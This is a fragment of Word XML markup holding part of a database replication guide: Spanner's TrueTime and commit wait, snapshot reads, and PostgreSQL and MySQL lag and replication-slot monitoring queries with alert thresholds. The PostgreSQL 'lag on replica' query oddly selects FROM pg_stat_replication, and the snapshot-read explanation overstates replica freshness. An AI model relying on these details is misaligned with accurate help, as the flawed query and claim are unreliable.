        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TrueTime</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — a globally synchronized clock with bounded uncertainty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060B763D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C3C1DA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>TrueTime API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F08ACE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  TT.now(): returns TimeInterval [earliest, latest]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5709ED08" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Guaranteed: actual current time is within [earliest, latest]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D73C60" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Uncertainty: ε = (latest - earliest) / 2, typically 1-7ms globally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0633FB02" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13311DD2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Implementation: GPS receivers + atomic clocks in each datacenter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E51CD91" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    GPS provides nanosecond accuracy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03480A12" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Atomic clocks provide holdover when GPS unavailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB71892" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Result: global clock uncertainty of 1-7ms (much less than network RTTs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436968B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3A4CDA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>External consistency (Spanner's key guarantee):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A338DC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  If transaction T1 commits before transaction T2 starts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C93EE4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    T1's commit timestamp &lt; T2's commit timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037E8B1F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ABD305" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CB277A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Transaction T assigns timestamp: commit_timestamp = TT.now().latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B66A29" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Wait until TT.now().earliest &gt; commit_timestamp before returning to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F135D85" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    (ensures no future transaction could claim an earlier timestamp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F77AC0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052D03E0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  This "commit wait" (1-7ms typically) ensures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFA5FF9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Any node reading at timestamp T sees all transactions committed before T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6240A4C1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    → Global snapshot reads are always consistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD5D06" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    → No read-your-writes violations regardless of which datacenter serves read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E69202" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C46F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Read-only transaction (snapshot read):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB75AE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Pick timestamp T = TT.now().latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9E6908" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read from any replica with data as of timestamp T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A302310" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  All replicas have data as of T (because writes wait for TrueTime uncertainty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDD768" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Globally consistent read, served from nearest replica (low latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD8C44" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → No locks required (reads don't conflict with writes at different timestamps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB0496" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="7E686963">
          <v:rect id="_x0000_i5517" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EBE04F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Monitoring Replication — Operational Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61090D3D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Metrics and Their Interpretation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334DD57F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replication lag — the primary health metric:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C043809" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6955F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- PostgreSQL: lag on primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FD5121" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311E1CE1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    client_addr,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B46BEEC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    application_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1417661D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    state,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B51C1B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    pg_wal_lsn_diff(pg_current_wal_lsn(), sent_lsn) AS send_lag_bytes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F043325" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    pg_wal_lsn_diff(sent_lsn, flush_lsn) AS flush_lag_bytes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2AC52A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    pg_wal_lsn_diff(flush_lsn, replay_lsn) AS replay_lag_bytes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DADB57" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    write_lag,   -- time primary waited for replica to write WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351D4E7B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    flush_lag,   -- time primary waited for replica to flush WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40588F2A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    replay_lag   -- time primary waited for replica to apply WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207906DE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>FROM pg_stat_replication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E09267F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="2016CAA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Lag interpretation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25692D74" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- send_lag_bytes: WAL generated but not yet sent to replica (network bottleneck?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F018B3D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- flush_lag_bytes: sent but not yet durable on replica (replica disk bottleneck?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094783AC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- replay_lag_bytes: durable on replica but not yet applied (apply bottleneck?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17930F2A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7FB98224" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- PostgreSQL: lag on replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC28EA6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E73B9D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    now() - pg_last_xact_replay_timestamp() AS replication_delay,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E6D08D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    pg_last_wal_receive_lsn() AS received_lsn,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB74E2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    pg_last_wal_replay_lsn() AS replayed_lsn,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481FDCC4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    pg_is_in_recovery() AS is_replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09651CCE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>FROM pg_stat_replication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070EB6E6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="5A8B4189" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- MySQL: lag on replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5E1683" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SHOW REPLICA STATUS\G</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53926F17" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Key fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC947B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Seconds_Behind_Source: estimated lag in seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64990554" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Replica_IO_Running: is replication connection alive?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6E4EC4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Replica_SQL_Running: is apply thread running?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD09A94" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Last_Error: last replication error (if any)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC716C1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Critical alerts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC0AEAC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F9DE0A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Alert: Replication lag &gt; 30 seconds (warning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC81280" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Alert: Replication lag &gt; 5 minutes (critical — failover may cause significant data loss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687AB5C7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Alert: Replication slot lag &gt; 10GB (primary disk risk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C881B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Alert: Replica IO/SQL thread not running (replication broken)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1E5476" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Alert: Replication error count increasing (investigate errors immediately)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B3F35" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1AD4B656" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Alert thresholds for synchronous replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D63D23D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  commit_latency p99 increasing &gt; 20% (replica becoming slower, commit latency rising)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29855590" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  synchronous replica count &lt; configured (replica lost, no longer synchronous)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B304243" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replication slot monitoring — critical for disk safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056AF316" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FC5873" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Monitor replication slot lag (PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA1C3A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B79BF01" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    slot_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A14C59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    plugin,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFADB01" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    slot_type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B0AC20" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    active,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC81DA5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    confirmed_flush_lsn,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74260A7F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    pg_wal_lsn_diff(pg_current_wal_lsn(), confirmed_flush_lsn) AS lag_bytes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D95E2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    pg_size_pretty(pg_wal_lsn_diff(pg_current_wal_lsn(), confirmed_flush_lsn)) AS lag_pretty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711BE0BB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>FROM pg_replication_slots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558959D9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>ORDER BY lag_bytes DESC;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1148B3AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="2D219F28" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Alert if any slot lag &gt; 10GB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE39AEB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>-- Primary will retain all WAL since the slot's confirmed_flush_lsn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBB1DF6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- If slot is stale (consumer disconnected), disk fills up → primary fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6879321E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
